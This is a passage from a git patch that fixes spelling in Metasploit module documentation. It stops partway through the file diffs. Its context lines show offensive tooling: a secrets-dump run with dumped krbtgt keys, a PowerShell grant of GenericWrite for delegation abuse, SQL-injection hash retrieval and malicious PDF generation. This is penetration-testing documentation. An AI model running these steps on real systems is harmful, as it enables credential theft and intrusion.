From 557a15a115cc92799cf3e158b05c7791ab2e3294 Mon Sep 17 00:00:00 2001 
From: h00die
Date: Tue, 10 Oct 2023 14:46:18 -0400
Subject: [PATCH 1/2] spelling fixes on docs
---
 .../auxiliary/admin/aws/aws_launch_instances.md | 6 +++---
 .../modules/auxiliary/admin/dcerpc/icpr_cert.md | 2 +-
 .../auxiliary/admin/http/cisco_7937g_ssh_privesc.md | 12 ++++++------
 .../auxiliary/admin/http/typo3_news_module_sqli.md | 4 ++--
 .../modules/auxiliary/admin/kerberos/get_ticket.md | 2 +-
 .../modules/auxiliary/admin/kerberos/keytab.md | 8 ++++----
 .../auxiliary/admin/ldap/ad_cs_cert_template.md | 4 ++--
 documentation/modules/auxiliary/admin/ldap/rbcd.md | 2 +-
 .../modules/auxiliary/analyze/crack_databases.md | 4 ++--
 .../auxiliary/client/telegram/send_message.md | 2 +-
 .../modules/auxiliary/cloud/aws/enum_iam.md | 2 +-
 .../auxiliary/dos/http/cable_haunt_websocket_dos.md | 2 +-
 documentation/modules/auxiliary/fileformat/badpdf.md | 2 +-
 .../modules/auxiliary/gather/cisco_rv320_config.md | 2 +-
 .../modules/auxiliary/gather/cloud_lookup.md | 2 +-
 .../modules/auxiliary/gather/elasticsearch_enum.md | 4 ++--
 .../gather/exchange_proxylogon_collector.md | 4 ++--
 .../modules/auxiliary/gather/get_user_spns.md | 2 +-
 .../hikvision_info_disclosure_cve_2017_7921.md | 4 ++--
 documentation/modules/auxiliary/gather/ldap_query.md | 2 +-
 .../modules/auxiliary/gather/office365userenum.md | 2 +-
 .../modules/auxiliary/gather/peplink_bauth_sqli.md | 4 ++--
 .../auxiliary/gather/piwigo_cve_2023_26876.md | 4 ++--
 .../gather/vbulletin_getindexablecontent_sqli.md | 4 ++--
 .../modules/auxiliary/gather/zoomeye_search.md | 2 +-
 .../modules/auxiliary/scanner/db2/discovery.md | 2 +-
 .../auxiliary/scanner/gopher/gopher_gophermap.md | 2 +-
 .../scanner/http/cassandra_web_file_read.md | 2 +-
 .../scanner/http/cisco_asa_clientless_vpn.md | 2 +-
 .../auxiliary/scanner/http/cisco_device_manager.md | 2 +-
 .../modules/auxiliary/scanner/http/dir_scanner.md | 2 +-
 .../scanner/http/es_file_explorer_open_port.md | 4 ++--
 .../scanner/http/frontpage_credential_dump.md | 2 +-
 .../modules/auxiliary/scanner/http/http_put.md | 2 +-
 .../modules/auxiliary/scanner/http/jira_user_enum.md | 2 +-
 .../http/manageengine_deviceexpert_user_creds.md | 2 +-
 .../auxiliary/scanner/http/tomcat_mgr_login.md | 2 +-
 .../auxiliary/scanner/http/wordpress_login_enum.md | 2 +-
 .../auxiliary/scanner/http/wp_easy_wp_smtp.md | 4 ++--
 .../auxiliary/scanner/misc/sunrpc_portmapper.md | 2 +-
 .../modules/auxiliary/scanner/mqtt/connect.md | 2 +-
 .../scanner/sap/sap_mgmt_con_listconfigfiles.md | 2 +-
 .../auxiliary/scanner/scada/profinet_siemens.md | 2 +-
 .../auxiliary/scanner/snmp/cisco_config_tftp.md | 2 +-
 .../auxiliary/scanner/ssh/juniper_backdoor.md | 2 +-
 .../auxiliary/scanner/ssl/openssl_heartbleed.md | 4 ++--
 .../modules/auxiliary/scanner/ssl/ssl_version.md | 2 +-
 .../modules/auxiliary/scanner/x11/open_x11.md | 2 +-
 .../modules/auxiliary/server/local_hwbridge.md | 4 ++--
 .../sqli/dlink/dlink_central_wifimanager_sqli.md | 4 ++--
 .../windows/applocker_evasion_regasm_regsvcs.md | 2 +-
 .../modules/evasion/windows/process_herpaderping.md | 4 ++--
 .../modules/evasion/windows/syscall_inject.md | 2 +-
 .../modules/exploit/aix/local/xorg_x11_server.md | 2 +-
 .../modules/exploit/android/local/put_user_vroot.md | 4 ++--
 .../exploit/freebsd/webapp/spamtitan_unauth_rce.md | 8 ++++----
 .../modules/exploit/linux/http/alienvault_exec.md | 2 +-
 .../modules/exploit/linux/http/cisco_rv32x_rce.md | 2 +-
 .../exploit/linux/http/cpi_tararchive_upload.md | 2 +-
 .../modules/exploit/linux/http/denyall_waf_exec.md | 2 +-
 .../linux/http/dlink_dwl_2600_command_injection.md | 2 +-
 .../fortinet_authentication_bypass_cve_2022_40684.md | 6 +++---
 .../exploit/linux/http/froxlor_log_path_rce.md | 2 +-
 .../modules/exploit/linux/http/goahead_ldpreload.md | 2 +-
 .../linux/http/grandstream_ucm62xx_sendemail_rce.md | 2 +-
 .../exploit/linux/http/huawei_hg532n_cmdinject.md | 8 ++++----
 .../exploit/linux/http/kaltura_unserialize_rce.md | 2 +-
 .../exploit/linux/http/lexmark_faxtrace_settings.md | 2 +-
 .../linux/http/microfocus_obr_cmd_injection.md | 2 +-
 .../exploit/linux/http/mobileiron_core_log4shell.md | 2 +-
 ...gios_xi_plugins_check_plugin_authenticated_rce.md | 2 +-
 .../linux/http/netgear_dgn1000_setup_unauth_exec.md | 4 ++--
 .../linux/http/rconfig_ajaxarchivefiles_rce.md | 2 +-
 .../linux/http/samsung_srv_1670d_upload_exec.md | 2 +-
 .../linux/http/synology_dsm_smart_exec_auth.md | 2 +-
 .../linux/http/totolink_unauth_rce_cve_2023_30013.md | 2 +-
 .../linux/http/trendmicro_imsva_widget_exec.md | 2 +-
 .../http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md | 2 +-
 .../http/wd_mycloud_unauthenticated_cmd_injection.md | 4 ++--
 .../modules/exploit/linux/http/xplico_exec.md | 8 ++++----
 .../linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md | 4 ++--
 .../exploit/linux/local/cve_2022_0995_watch_queue.md | 2 +-
 .../exploit/linux/local/docker_runc_escape.md | 2 +-
 .../exploit/linux/local/juju_run_agent_priv_esc.md | 2 +-
 .../exploit/linux/local/service_persistence.md | 2 +-
 .../exploit/linux/local/sudoedit_bypass_priv_esc.md | 2 +-
 .../misc/zyxel_multiple_devices_zhttp_lan_rce.md | 4 ++--
 .../linux/redis/redis_replication_cmd_exec.md | 2 +-
 .../modules/exploit/linux/samba/is_known_pipename.md | 2 +-
 .../exploit/linux/samba/lsa_transnames_heap.md | 2 +-
 .../modules/exploit/mainframe/ftp/ftp_jcl_creds.md | 2 +-
 .../multi/http/apache_flink_jar_upload_exec.md | 4 ++--
 .../exploit/multi/http/apache_nifi_processor_rce.md | 2 +-
 .../modules/exploit/multi/http/cockpit_cms_rce.md | 2 +-
 .../exploit/multi/http/horde_form_file_upload.md | 2 +-
 .../exploit/multi/http/magento_unserialize.md | 2 +-
 .../exploit/multi/http/makoserver_cmd_exec.md | 2 +-
 .../multi/http/microfocus_ucmdb_unauth_deser.md | 2 +-
 .../exploit/multi/http/moodle_spelling_path_rce.md | 2 +-
 .../moodle_teacher_enrollment_priv_esc_to_rce.md | 4 ++--
 .../multi/http/opmanager_sumpdu_deserialization.md | 2 +-
 .../exploit/multi/http/phpmailer_arg_injection.md | 2 +-
 .../exploit/multi/http/qdpm_authenticated_rce.md | 2 +-
 .../http/sonicwall_shell_injection_cve_2023_34124.md | 2 +-
 .../exploit/multi/http/struts2_multi_eval_ognl.md | 2 +-
 .../modules/exploit/multi/http/tomcat_mgr_deploy.md | 2 +-
 .../modules/exploit/multi/http/tomcat_mgr_upload.md | 2 +-
 .../multi/http/vbulletin_getindexablecontent.md | 6 +++---
 .../modules/exploit/multi/http/zabbix_script_exec.md | 6 +++---
 .../modules/exploit/multi/mysql/mysql_udf_payload.md | 2 +-
 .../modules/exploit/multi/php/jorani_path_trav.md | 2 +-
 .../modules/exploit/multi/script/web_delivery.md | 2 +-
 .../exploit/osx/local/timemachine_cmd_injection.md | 2 +-
 .../exploit/unix/http/pfsense_config_data_exec.md | 2 +-
 .../unix/http/pfsense_graph_injection_exec.md | 4 ++--
 .../modules/exploit/unix/http/zivif_ipcheck_exec.md | 2 +-
 .../exploit/unix/misc/polycom_hdx_traceroute_exec.md | 4 ++--
 .../exploit/unix/webapp/bolt_authenticated_rce.md | 2 +-
 .../unix/webapp/opennetadmin_ping_cmd_injection.md | 2 +-
 .../exploit/unix/webapp/xymon_useradm_cmd_exec.md | 2 +-
 .../exploit/unix/webapp/zoneminder_lang_exec.md | 2 +-
 .../modules/exploit/windows/backupexec/ssl_uaf.md | 2 +-
 .../windows/browser/ms14_064_ole_code_execution.md | 2 +-
 .../exploit/windows/fileformat/foxit_reader_uaf.md | 2 +-
 .../exploit/windows/fileformat/office_ms17_11882.md | 2 +-
 .../modules/exploit/windows/fileformat/vlc_mkv.md | 2 +-
 .../exploit/windows/fileformat/word_mshtml_rce.md | 4 ++--
 .../modules/exploit/windows/ftp/ftpshell_cli_bof.md | 2 +-
 .../windows/http/apache_activemq_traversal_upload.md | 2 +-
 .../windows/http/dnn_cookie_deserialization_rce.md | 6 +++---
 .../exploit/windows/http/exchange_proxyshell_rce.md | 2 +-
 .../exploit/windows/http/lg_simple_editor_rce.md | 2 +-
 ...manageengine_adselfservice_plus_cve_2022_28810.md | 2 +-
 .../windows/http/manageengine_appmanager_exec.md | 2 +-
 .../exploit/windows/http/oats_weblogic_console.md | 2 +-
 .../windows/http/sitecore_xp_cve_2021_42237.md | 2 +-
 .../http/trendmicro_officescan_widget_exec.md | 2 +-
 .../windows/local/cve_2020_0668_service_tracing.md | 2 +-
 .../windows/local/cve_2020_1048_printerdemon.md | 2 +-
 .../windows/local/cve_2020_1337_printerdemon.md | 2 +-
 .../windows/local/cve_2022_26904_superprofile.md | 2 +-
 .../exploit/windows/local/lexmark_driver_privesc.md | 2 +-
 .../exploit/windows/local/ms16_075_reflection.md | 2 +-
 .../modules/exploit/windows/local/ms16_reflection.md | 2 +-
 .../modules/exploit/windows/local/tokenmagic.md | 2 +-
 .../local/windscribe_windscribeservice_priv_esc.md | 2 +-
 .../exploit/windows/misc/ahsay_backup_fileupload.md | 4 ++--
 .../exploit/windows/misc/ais_esel_server_rce.md | 10 +++++-----
 .../modules/exploit/windows/misc/cloudme_sync.md | 2 +-
 .../misc/hp_imc_dbman_restartdb_unauth_rce.md | 2 +-
 .../misc/hp_imc_dbman_restoredbase_unauth_rce.md | 2 +-
 .../windows/misc/hp_loadrunner_magentproc_cmdexec.md | 2 +-
 .../exploit/windows/tftp/distinct_tftp_traversal.md | 2 +-
 .../payload/windows/meterpreter/reverse_https.md | 2 +-
 .../payload/windows/meterpreter/reverse_tcp.md | 6 +++---
 .../modules/post/android/gather/sub_info.md | 2 +-
 .../modules/post/hardware/automotive/canprobe.md | 4 ++--
 .../modules/post/hardware/automotive/getvinfo.md | 2 +-
 documentation/modules/post/linux/gather/hashdump.md | 2 +-
 .../modules/post/linux/manage/disable_clamav.md | 2 +-
 .../post/multi/escalate/aws_create_iam_user.md | 6 +++---
 .../modules/post/multi/gather/enum_hexchat.md | 2 +-
 .../post/multi/gather/unix_cached_ad_hashes.md | 4 ++--
 documentation/modules/post/multi/manage/open.md | 2 +-
 .../modules/post/multi/manage/play_youtube.md | 4 ++--
 documentation/modules/post/osx/gather/gitignore.md | 2 +-
 .../modules/post/windows/capture/keylog_recorder.md | 8 ++++----
 .../post/windows/escalate/unmarshal_cmd_exec.md | 2 +-
 .../modules/post/windows/gather/bitlocker_fvek.md | 2 +-
 .../modules/post/windows/gather/bloodhound.md | 2 +-
 .../modules/post/windows/gather/credentials/aim.md | 4 ++--
 .../post/windows/gather/credentials/chrome.md | 4 ++--
 .../post/windows/gather/credentials/comodo.md | 4 ++--
 .../post/windows/gather/credentials/coolnovo.md | 4 ++--
 .../post/windows/gather/credentials/digsby.md | 4 ++--
 .../modules/post/windows/gather/credentials/flock.md | 4 ++--
 .../post/windows/gather/credentials/gadugadu.md | 4 ++--
 .../modules/post/windows/gather/credentials/icq.md | 4 ++--
 .../modules/post/windows/gather/credentials/ie.md | 4 ++--
 .../post/windows/gather/credentials/incredimail.md | 4 ++--
 .../post/windows/gather/credentials/kakaotalk.md | 4 ++--
 .../post/windows/gather/credentials/kmeleon.md | 4 ++--
 .../modules/post/windows/gather/credentials/line.md | 4 ++--
 .../post/windows/gather/credentials/maxthon.md | 4 ++--
 .../post/windows/gather/credentials/miranda.md | 4 ++--
 .../modules/post/windows/gather/credentials/opera.md | 4 ++--
 .../post/windows/gather/credentials/operamail.md | 4 ++--
 .../post/windows/gather/credentials/postbox.md | 4 ++--
 .../modules/post/windows/gather/credentials/qq.md | 4 ++--
 .../post/windows/gather/credentials/safari.md | 4 ++--
 .../post/windows/gather/credentials/seamonkey.md | 4 ++--
 .../post/windows/gather/credentials/srware.md | 4 ++--
 .../modules/post/windows/gather/credentials/tango.md | 4 ++--
 .../post/windows/gather/credentials/thunderbird.md | 4 ++--
 .../modules/post/windows/gather/credentials/tlen.md | 4 ++--
 .../modules/post/windows/gather/credentials/viber.md | 4 ++--
 .../windows/gather/credentials/windowslivemail.md | 4 ++--
 .../modules/post/windows/gather/credentials/xchat.md | 4 ++--
 .../post/windows/gather/forensics/fanny_bmp_check.md | 2 +-
 .../modules/post/windows/gather/lsa_secrets.md | 2 +-
 .../modules/post/windows/gather/make_csv_orgchart.md | 2 +-
 .../modules/post/windows/gather/ntds_grabber.md | 4 ++--
 .../post/windows/manage/dell_memory_protect.md | 6 +++---
 .../post/windows/manage/execute_dotnet_assembly.md | 6 +++---
 .../modules/post/windows/manage/hashcarve.md | 2 +-
 .../modules/post/windows/manage/peinjector.md | 6 +++---
 .../modules/post/windows/manage/priv_migrate.md | 2 +-
 207 files changed, 309 insertions(+), 309 deletions(-)
diff --git a/documentation/modules/auxiliary/admin/aws/aws_launch_instances.md b/documentation/modules/auxiliary/admin/aws/aws_launch_instances.md
index 6e906b44ef6c..3a7a1f1bfc32 100644
--- a/documentation/modules/auxiliary/admin/aws/aws_launch_instances.md
+++ b/documentation/modules/auxiliary/admin/aws/aws_launch_instances.md
@@ -21,7 +21,7 @@ Shell #1:
 [*] instance i-12345678 status: initializing
 ...
 [*] instance i-12345678 status: ok
-[*] Instance i-12345678 has IP adrress 35.12.4.1
+[*] Instance i-12345678 has IP address 35.12.4.1
 [*] Auxiliary module execution completed
 ```
 
@@ -56,7 +56,7 @@ can be made available by assigning an Internet routable IP address to a host or
 routing traffic to it through an ELB (Elastic Load Balancer). In either case security-groups are used to open access to network ranges and specific TPC/UDP ports. Security-groups provide much of the functionality of traditional firewalls
-and can be configured by specifyig a protocol, a CIDR and a port.
+and can be configured by specifying a protocol, a CIDR and a port.
 
 ## How it Works
 
@@ -126,7 +126,7 @@ Advanced Options:
 * `INSTANCE_TYPE`: The instance type
 * `MaxCount`: Maximum number of instances to launch
-* `MinCount`: Minumum number of instances to launch
+* `MinCount`: Minimum number of instances to launch
 * `ROLE_NAME`: The instance profile/role name
 * `RPORT:` AWS EC2 Endpoint TCP Port
 * `SEC_GROUP_ID`: the EC2 security group to use
diff --git a/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md b/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
index 07b89adf068e..6aa09e8889b2 100644
--- a/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
@@ -127,7 +127,7 @@ has the [KB5014754][KB5014754] patch applied and the REG_DWORD
 account with the specified UPN should be supplied as well. In November of 2023, Microsoft will change the default value of `StrongCertificateBindingEnforcement` to 2. If the server has the patch applied, the SID will be returned in the issued certificate which ensures that the required strong mapping is in place. If the strong mapping is required and the
-SID is not specified in the certificate, then Kerberos authentication wil fail with `KDC_ERR_CERTIFICATE_MISMATCH`.
+SID is not specified in the certificate, then Kerberos authentication will fail with `KDC_ERR_CERTIFICATE_MISMATCH`.
 
 The user must know:
 
diff --git a/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md b/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md
index 6c3b6941f9d5..6d5577fae5b3 100644
--- a/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md
@@ -128,7 +128,7 @@ ncasCb - Show detailed ncas information, related to either call services,
 uptime - Show phone uptime.
 appPrt - Show UI's call status.
 fntPrt - Show information about fonts available on phone.
-memtop - Shows the top poiter to current memory.
+memtop - Shows the top pointer to current memory.
 removeScheduledLogEntry - debug
 addScheduledLogEntry - debug
 fatalError - Simulate fatal error for the phone.
@@ -178,8 +178,8 @@ localePrintAll - localePrintAll
 ceShow - Show Client Engine Status
 
 Commands 101 to 121:
-udiShow - Show Unique Device Indentifier
-show - Show Unique Device Indentifier
+udiShow - Show Unique Device Identifier
+show - Show Unique Device Identifier
 pbnShow - Display app & bootrom headers
 upr - Upgrade to a Rockpile Standalone Image
 upm - Upgrade to a Rockpile Manf Image
@@ -336,7 +336,7 @@ ncasCb - Show detailed ncas information, related to either call services,
 uptime - Show phone uptime.
 appPrt - Show UI's call status.
 fntPrt - Show information about fonts available on phone.
-memtop - Shows the top poiter to current memory.
+memtop - Shows the top pointer to current memory.
 removeScheduledLogEntry - debug
 addScheduledLogEntry - debug
 fatalError - Simulate fatal error for the phone.
@@ -386,8 +386,8 @@ localePrintAll - localePrintAll
 ceShow - Show Client Engine Status
 
 Commands 101 to 121:
-udiShow - Show Unique Device Indentifier
-show - Show Unique Device Indentifier
+udiShow - Show Unique Device Identifier
+show - Show Unique Device Identifier
 pbnShow - Display app & bootrom headers
 upr - Upgrade to a Rockpile Standalone Image
 upm - Upgrade to a Rockpile Manf Image
diff --git a/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md b/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md
index c53094844864..6330a66b89ac 100644
--- a/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md
+++ b/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md
@@ -4,7 +4,7 @@ News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vul
 
 ## Vulnerable Application
 
-In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the paramter name. This allows a user to inject values to an SQL query.
+In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the parameter name. This allows a user to inject values to an SQL query.
 
 To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash.
 
@@ -28,7 +28,7 @@ The value for query parameter `id` of the page that the news extension is runnin
 - [ ] Enable the news extension
 - [ ] Import [vulnerable page](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip)
 - [ ] Enable page
-- [ ] Verify if page is visble to unauthenticated user and note the id
+- [ ] Verify if page is visible to unauthenticated user and note the id
 - [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost ; set id ; run'`
 - [ ] Username and password hash should have been retrieved
 
diff --git a/documentation/modules/auxiliary/admin/kerberos/get_ticket.md b/documentation/modules/auxiliary/admin/kerberos/get_ticket.md
index 6e7dc7d66a9d..20f1fdc1dd93 100644
--- a/documentation/modules/auxiliary/admin/kerberos/get_ticket.md
+++ b/documentation/modules/auxiliary/admin/kerberos/get_ticket.md
@@ -78,7 +78,7 @@ Default is `true`.
 
 This option is only used when requesting a TGS.
 
-The Kerberos TGT to use when requesting the sevice ticket. If unset, the database will be checked'
+The Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked'
 
 ## Scenarios
 
diff --git a/documentation/modules/auxiliary/admin/kerberos/keytab.md b/documentation/modules/auxiliary/admin/kerberos/keytab.md
index 80f4ffa87696..362e75831a24 100644
--- a/documentation/modules/auxiliary/admin/kerberos/keytab.md
+++ b/documentation/modules/auxiliary/admin/kerberos/keytab.md
@@ -63,7 +63,7 @@ Export Kerberos encryption keys stored in the Metasploit database to a keytab fi
 # Secrets dump
 msf6 > use auxiliary/gather/windows_secrets_dump
 msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
-... ommitted ...
+... omitted ...
 # Kerberos keys:
 Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01
 Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea
@@ -72,7 +72,7 @@ Administrator:des-cbc-crc:ad49d9d92f5da170
 krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
 krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da
 krbtgt:des-cbc-md5:3ddf2f627c4cbcdc
-... ommitted ...
+... omitted ...
 [*] Auxiliary module execution completed
 
 # Export to keytab
@@ -94,7 +94,7 @@ Keytab entries
 1 18 (AES256) krbtgt@adf3.local e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c 1970-01-01 01:00:00 +0100
 1 17 (AES128) krbtgt@adf3.local ba87b2bc064673da39f40d37f9daa9da 1970-01-01 01:00:00 +0100
 1 3 (DES_CBC_MD5) krbtgt@adf3.local 3ddf2f627c4cbcdc 1970-01-01 01:00:00 +0100
-... ommitted ...
+... omitted ...
 [*] Auxiliary module execution completed
 ```
 
@@ -168,7 +168,7 @@ tgs-req
 ^^^^^^^^^^^^^^ authenticator value now decrypted using the previously generated keytab file
 ```
 
-If you have exported the `krbtgt` account to the keytab file - Wireshark will also decrypt the TGT ticket itsel. If not - Wireshark
+If you have exported the `krbtgt` account to the keytab file - Wireshark will also decrypt the TGT ticket itself. If not - Wireshark
 will generate warnings about being unable to decrypt the TGT ticket which is signed using the krbtgt account.
 
 Additional details: https://wiki.wireshark.org/Kerberos
diff --git a/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md b/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md
index 0ad3fdcf64f4..2f148673fd86 100644
--- a/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md
+++ b/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md
@@ -56,11 +56,11 @@ The file format is determined by the extension so the file must end in either `.
 #### The JSON format
 
 The JSON file format is a hash with attribute name keys and ASCII-hex encoded values. These files are compatible with
-[`Certipy`'s][certipy] `template` command. This module uses the JSON file format when storing copies fo certificate to
+[`Certipy`'s][certipy] `template` command. This module uses the JSON file format when storing copies of certificate to
 disk.
 
 #### The YAML format
 
-The YAML file format is similiar to the JSON file format, but takes advantage of YAML's ability to include comments.
+The YAML file format is similar to the JSON file format, but takes advantage of YAML's ability to include comments.
 The file consists of a hash with attribute name keys and value strings. The `nTSecurityDescriptor` file can be either a binary string representing a literal value, or a security descriptor defined in Microsoft's [Security Descriptor Definition Language (SDDL)][sddl]. Premade configuration templates provided by Metasploit use this format.
diff --git a/documentation/modules/auxiliary/admin/ldap/rbcd.md b/documentation/modules/auxiliary/admin/ldap/rbcd.md
index ca9cce477c78..dc4d1f2d3fce 100644
--- a/documentation/modules/auxiliary/admin/ldap/rbcd.md
+++ b/documentation/modules/auxiliary/admin/ldap/rbcd.md
@@ -32,7 +32,7 @@ Grant Write privileges for sandy to the target machine, i.e. `WS01`:
 $TargetComputer = Get-ADComputer 'WS01'
 $User = Get-ADUser 'sandy'
 
-# Add GenericWrite access to the user against the target coputer
+# Add GenericWrite access to the user against the target computer
 $Rights = [System.DirectoryServices.ActiveDirectoryRights] "GenericWrite"
 $ControlType = [System.Security.AccessControl.AccessControlType] "Allow"
 $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All"
diff --git a/documentation/modules/auxiliary/analyze/crack_databases.md b/documentation/modules/auxiliary/analyze/crack_databases.md
index 2ebdbc9a5111..3262d10d6efb 100644
--- a/documentation/modules/auxiliary/analyze/crack_databases.md
+++ b/documentation/modules/auxiliary/analyze/crack_databases.md
@@ -169,7 +169,7 @@ creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D48
 creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E278$
 creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
 creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-## oracle (10) uses usernames in the hashing, so we can't overide that here
+## oracle (10) uses usernames in the hashing, so we can't override that here
 creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
 creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
 ## oracle 11/12 H value, username is used
@@ -177,7 +177,7 @@ creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C
 ## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb
 creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:$
 creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B3$
-##postgres uses username, so we can't overide that here
+##postgres uses username, so we can't override that here
 creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
 creds add user:example postgres:md5be86a79bf20fake2d58d5453c47d4860
 echo "" > /root/.msf4/john.pot
diff --git a/documentation/modules/auxiliary/client/telegram/send_message.md b/documentation/modules/auxiliary/client/telegram/send_message.md
index f2a55ae97131..eaff416d9b87 100644
--- a/documentation/modules/auxiliary/client/telegram/send_message.md
+++ b/documentation/modules/auxiliary/client/telegram/send_message.md
@@ -53,7 +53,7 @@ Module options (auxiliary/client/telegram/send_message):
 BOT_TOKEN yes Telegram BOT token
 CHAT_ID no Chat ID for the BOT
 DOCUMENT no The path to the document(binary, video etc)
- FORMATTING Markdown no Message formating option (Markdown|MarkdownV2|HTML) (Accepted: Markdown, MarkdownV2, HT
+ FORMATTING Markdown no Message formatting option (Markdown|MarkdownV2|HTML) (Accepted: Markdown, MarkdownV2, HT
 ML)
 IDFILE no File containing chat IDs, one per line
 MESSAGE no The message to be sent
diff --git a/documentation/modules/auxiliary/cloud/aws/enum_iam.md b/documentation/modules/auxiliary/cloud/aws/enum_iam.md
index ac7a1d9b71a7..776adb7e2ac7 100644
--- a/documentation/modules/auxiliary/cloud/aws/enum_iam.md
+++ b/documentation/modules/auxiliary/cloud/aws/enum_iam.md
@@ -43,7 +43,7 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a
 
 **LIMIT**
 
- Some AWS API calls support limiting output, such that the module will only reutrn the number of instances, without detailing the configuration of each instance. Optionally, this module's output can be filtered to minimize the query to AWS and the user output. Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
+ Some AWS API calls support limiting output, such that the module will only return the number of instances, without detailing the configuration of each instance. Optionally, this module's output can be filtered to minimize the query to AWS and the user output. Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
 
 Note that the `LIMIT` parameter is imposed per region, so the total number of results may be higher than the user-specified limit, but the maximum number of results for a single region will not exceed `LIMIT`. This behavior is due to the AWS API.
 
diff --git a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md
index 00bbaa4a23eb..3e166c0db54a 100644
--- a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md
+++ b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md
@@ -10,7 +10,7 @@ Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more info
 
 **WS_USERNAME**
 
-This is the basic auth username for the spectrum analysis web service. This is typicall default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`. This will vary from manufacturer to manufacturer and ISP to ISP.
+This is the basic auth username for the spectrum analysis web service. This is typically default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`. This will vary from manufacturer to manufacturer and ISP to ISP.
 
 **WS_PASSWORD**
 
diff --git a/documentation/modules/auxiliary/fileformat/badpdf.md b/documentation/modules/auxiliary/fileformat/badpdf.md
index 0baca14c2485..17f1d0bba74b 100644
--- a/documentation/modules/auxiliary/fileformat/badpdf.md
+++ b/documentation/modules/auxiliary/fileformat/badpdf.md
@@ -85,7 +85,7 @@ msf auxiliary(fileformat/badpdf) > set pdfinject /root/Desktop/example.pdf
 pdfinject => /root/Desktop/example.pdf
 msf auxiliary(fileformat/badpdf) > exploit
-[+] Malicious file writen to /root/Desktop/example_malicious.pdf
+[+] Malicious file written to /root/Desktop/example_malicious.pdf
 [\*] Auxiliary module execution completed
 msf auxiliary(fileformat/badpdf) >
diff --git a/documentation/modules/auxiliary/gather/cisco_rv320_config.md b/documentation/modules/auxiliary/gather/cisco_rv320_config.md
index f641b0b4ddd3..d1383e70b9f1 100644
--- a/documentation/modules/auxiliary/gather/cisco_rv320_config.md
+++ b/documentation/modules/auxiliary/gather/cisco_rv320_config.md
@@ -2,7 +2,7 @@
 [CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router. The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52).
 
